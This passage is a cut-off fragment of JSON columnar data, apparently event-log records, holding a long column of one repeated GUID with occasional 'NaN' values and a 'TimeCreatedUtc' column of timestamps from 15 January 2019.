0-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"NaN\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"NaN\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"NaN\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"NaN\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"NaN\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeCreatedUtc\":[\"NaN\",\"2019-01-15 04:15:26.000\",\"2019-01-15 04:16:24.007\",\"2019-01-15 04:16:24.027\",\"2019-01-15 04:19:26.000\",\"2019-01-15 04:50:26.010\",\"2019-01-15 04:51:26.000\",\"2019-01-15 04:52:24.000\",\"2019-01-15 04:52:24.020\",\"2019-01-15 04:52:26.013\",\"2019-01-15 04:53:26.000\",\"2019-01-15 04:54:24.003\",\"2019-01-15 04:54:24.020\",\"2019-01-15 04:20:24.000\",\"2019-01-15 04:20:24.017\",\"2019-01-15 04:54:26.007\",\"2019-01-15 04:55:26.000\",\"2019-01-15 04:56:24.003\",\"2019-01-15 04:56:24.020\",\"2019-01-15 04:56:26.000\",\"2019-01-15 04:57:26.000\",\"2019-01-15 04:58:24.013\",\"2019-01-15 04:58:24.030\",\"2019-01-15 04:58:26.010\",\"2019-01-15 04:59:26.017\",\"2019-01-15 05:00:24.003\",\"2019-01-15 05:00:24.017\",\"2019-01-15 05:00:26.000\",\"2019-01-15 05:01:26.007\",\"2019-01-15 05:02:24.000\",\"2019-01-15 05:02:24.027\",\"2019-01-15 05:02:26.003\",\"2019-01-15 05:02:28.260\",\"2019-01-15 05:02:28.270\",\"2019-01-15 05:03:26.000\",\"2019-01-15 05:04:24.000\",\"2019-01-15 05:04:24.020\",\"2019-01-15 04:20:26.007\",\"2019-01-15 05:04:26.007\",\"2019-01-15 05:05:26.000\",\"2019-01-15 05:06:24.000\",\"2019-01-15 05:06:24.043\",\"2019-01-15 05:06:26.000\",\"2019-01-15 05:07:26.003\",\"2019-01-15 05:08:24.013\",\"2019-01-15 05:08:24.030\",\"2019-01-15 04:21:26.000\",\"2019-01-15 05:08:26.007\",\"2019-01-15 05:09:26.010\",\"2019-01-15 05:10:24.000\",\"2019-01-15 05:10:24.047\",\"2019-01-15 05:10:26.000\",\"2019-01-15 05:11:26.000\",\"2019-01-15 05:12:24.007\",\"2019-01-15 05:12:24.023\",\"2019-01-15 04:22:24.017\",\"2019-01-15 04:22:24.030\",\"2019-01-15 05:12:26.003\",\"2019-01-15 05:13:26.007\",\"2019-01-15 05:14:24.003\",\"2019-01-15 05:14:24.023\",\"2019-01-15 05:14:26.013\",\"2019-01-15 04:22:26.010\",\"2019-01-15 04:23:26.000\",\"2019-01-15 04:24:24.000\",\"2019-01-15 04:24:24.017\",\"2019-01-15 04:24:26.000\",\"2019-01-15 04:25:26.000\",\"2019-01-15 04:26:24.000\",\"2019-01-15 04:26:24.017\",\"2019-01-15 04:26:26.007\",\"2019-01-15 04:27:26.000\",\"2019-01-15 04:28:24.003\",\"2019-01-15 04:28:24.020\",\"2019-01-15 05:15:26.013\",\"2019-01-15 05:16:24.003\",\"2019-01-15 05:16:24.020\",\"2019-01-15 05:16:26.007\",\"2019-01-15 05:17:26.000\",\"2019-01-15 05:18:24.010\",\"2019-01-15 05:18:24.027\",\"2019-01-15 05:18:26.010\",\"2019-01-15 05:19:26.000\",\"2019-01-15 05:20:24.000\",\"2019-01-15 05:20:24.017\",\"2019-01-15 05:20:26.017\",\"2019-01-15 05:21:26.003\",\"2019-01-15 05:22:24.007\",\"2019-01-15 05:22:24.023\",\"2019-01-15 05:22:26.007\",\"2019-01-15 05:23:26.000\",\"2019-01-15 05:24:24.010\",\"2019-01-15 05:24:24.023\",\"2019-01-15 04:28:26.013\",\"2019-01-15 05:24:26.010\",\"2019-01-15 04:29:26.010\",\"2019-01-15 04:30:24.007\",\"2019-01-15 04:30:24.023\",\"2019-01-15 04:16:26.000\",\"2019-01-15 04:30:26.000\",\"2019-01-15 04:31:26.000\",\"2019-01-15 04:32:24.010\",\"2019-01-15 04:32:24.027\",\"2019-01-15 04:32:26.000\",\"2019-01-15 04:33:26.003\",\"2019-01-15 04:17:26.000\",\"2019-01-15 04:34:24.010\",\"2019-01-15 04:34:24.030\",\"2019-01-15 04:34:26.000\",\"2019-01-15 04:35:26.010\",\"2019-01-15 04:36:24.010\",\"2019-01-15 04:36:24.027\",\"2019-01-15 04:18:24.003\",\"2019-01-15 04:18:24.020\",\"2019-01-15 04:36:26.000\",\"2019-01-15 04:37:26.007\",\"2019-01-15 04:38:24.000\",\"2019-01-15 04:38:24.020\",\"2019-01-15 04:38:26.017\",\"2019-01-15 04:39:26.000\",\"2019-01-15 04:40:24.013\",\"2019-01-15 04:40:24.027\",\"2019-01-15 04:40:26.000\",\"2019-01-15 04:41:26.000\",\"2019-01-15 04:42:24.000\",\"2019-01-15 04:42:24.017\",\"2019-01-15 04:42:26.007\",\"2019-01-15 04:43:26.000\",\"2019-01-15 04:44:24.000\",\"2019-01-15 04:44:24.017\",\"2019-01-15 04:44:26.007\",\"2019-01-15 04:45:24.523\",\"2019-01-15 04:45:26.007\",\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:18:26.010\",\"2019-01-15 04:46:26.007\",\"2019-01-15 04:47:26.000\",\"2019-01-15 04:48:24.013\",\"2019-01-15 04:48:24.030\",\"2019-01-15 04:48:26.017\",\"2019-01-15 04:49:26.010\",\"2019-01-15 04:50:24.000\",\"2019-01-15 04:50:24.017\",\"NaN\",\"2019-01-15 04:50:25.693\",\"2019-01-15 04:52:25.613\",\"2019-01-15 04:54:25.557\",\"2019-01-15 04:56:25.490\",\"2019-01-15 04:58:25.427\",\"2019-01-15 05:00:25.363\",\"2019-01-15 05:01:52.640\",\"2019-01-15 04:20:25.423\",\"2019-01-15 05:02:25.293\",\"2019-01-15 05:04:25.837\",\"2019-01-15 05:06:25.770\",\"2019-01-15 05:08:25.717\",\"2019-01-15 05:10:25.653\",\"2019-01-15 05:12:25.590\",\"2019-01-15 05:14:25.517\",\"2019-01-15 05:15:03.017\",\"2019-01-15 04:22:25.360\",\"2019-01-15 05:15:05.193\",\"2019-01-15 04:24:25.307\",\"2019-01-15 04:26:25.833\",\"2019-01-15 04:16:25.550\",\"2019-01-15 05:16:25.453\",\"2019-01-15 05:18:25.407\",\"2019-01-15 04:28:25.770\",\"2019-01-15 05:20:25.337\",\"2019-01-15 05:22:25.863\",\"2019-01-15 05:24:25.807\",\"2019-01-15 04:30:25.710\",\"2019-01-15 04:32:25.650\",\"2019-01-15 04:33:32.463\",\"2019-01-15 04:34:25.583\",\"2019-01-15 04:35:16.060\",\"2019-01-15 04:36:25.517\",\"2019-01-15 04:38:25.453\",\"2019-01-15 04:40:25.393\",\"2019-01-15 04:42:25.387\",\"2019-01-15 04:18:25.490\",\"2019-01-15 04:44:25.867\",\"2019-01-15 04:45:28.157\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:48:25.743\",\"NaN\",\"2019-01-15 05:12:25.403\",\"2019-01-15 05:15:03.047\",\"2019-01-15 05:15:03.057\",\"2019-01-15 05:15:03.247\",\"2019-01-15 05:15:03.257\",\"2019-01-15 05:15:03.390\",\"2019-01-15 05:15:03.410\",\"2019-01-15 05:15:03.503\",\"2019-01-15 05:15:03.517\",\"2019-01-15 05:15:03.830\",\"2019-01-15 05:15:08.723\",\"2019-01-15 05:15:10.667\",\"2019-01-15 05:15:10.683\",\"2019-01-15 05:15:10.707\",\"2019-01-15 05:15:10.730\",\"2019-01-15 05:15:10.753\",\"2019-01-15 05:15:11.190\",\"2019-01-15 05:15:11.260\",\"2019-01-15 05:15:11.347\",\"2019-01-15 05:15:11.413\",\"2019-01-15 05:15:11.493\",\"2019-01-15 05:15:11.537\",\"2019-01-15 05:15:11.617\",\"2019-01-15 05:15:11.767\",\"2019-01-15 05:15:11.833\",\"2019-01-15 05:15:11.947\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.003\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.067\",\"2019-01-15 05:15:12.160\",\"2019-01-15 05:15:12.123\",\"2019-01-15 05:15:12.337\",\"2019-01-15 05:15:12.393\",\"2019-01-15 05:15:12.460\",\"2019-01-15 05:15:12.513\",\"2019-01-15 05:15:12.610\",\"2019-01-15 05:15:12.670\",\"2019-01-15 05:15:12.740\",\"2019-01-15 05:15:12.847\",\"2019-01-15 05:15:12.930\",\"2019-01-15 05:15:12.977\",\"2019-01-15 05:15:13.053\",\"2019-01-15 05:15:13.100\",\"2019-01-15 05:15:13.173\",\"2019-01-15 05:15:13.220\",\"2019-01-15 05:15:13.287\",\"2019-01-15 05:15:13.337\",\"2019-01-15 05:15:13.407\",\"2019-01-15 05:15:13.453\",\"2019-01-15 05:15:13.517\",\"2019-01-15 05:15:13.567\",\"2019-01-15 05:15:13.633\",\"2019-01-15 05:15:13.683\",\"2019-01-15 05:15:13.747\",\"2019-01-15 05:15:13.793\",\"2019-01-15 05:15:13.867\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.100\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.227\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.377\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:15:14.493\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.770\",\"2019-01-15 05:15:15.160\",\"2019-01-15 05:15:15.183\",\"2019-01-15 05:15:15.233\",\"2019-01-15 05:15:15.283\",\"2019-01-15 05:15:15.317\",\"2019-01-15 05:15:15.440\",\"2019-01-15 05:15:15.457\",\"2019-01-15 05:15:15.483\",\"2019-01-15 05:15:15.500\",\"2019-01-15 05:15:15.520\",\"2019-01-15 05:15:15.533\",\"2019-01-15 05:15:15.553\",\"2019-01-15 05:15:15.570\",\"2019-01-15 05:15:15.620\",\"2019-01-15 05:15:15.677\",\"2019-01-15 05:15:15.727\",\"2019-01-15 05:15:15.777\",\"2019-01-15 05:15:15.827\",\"2019-01-15 05:15:15.880\",\"2019-01-15 05:15:15.923\",\"2019-01-15 05:15:15.950\",\"2019-01-15 05:15:15.967\",\"2019-01-15 05:15:16.020\",\"2019-01-15 05:15:16.067\",\"2019-01-15 05:15:16.117\",\"2019-01-15 05:15:16.167\",\"2019-01-15 05:15:16.277\",\"2019-01-15 05:15:16.340\",\"2019-01-15 05:15:16.353\",\"2019-01-15 05:15:16.400\",\"2019-01-15 05:15:16.430\",\"2019-01-15 05:15:16.447\",\"2019-01-15 05:15:16.500\",\"2019-01-15 05:15:16.510\",\"2019-01-15 05:15:16.520\",\"2019-01-15 05:15:16.563\",\"2019-01-15 05:15:16.613\",\"2019-01-15 05:15:16.663\",\"2019-01-15 05:15:16.677\",\"2019-01-15 05:15:16.720\",\"2019-01-15 05:15:16.767\",\"2019-01-15 05:15:16.807\",\"2019-01-15 05:15:16.850\",\"2019-01-15 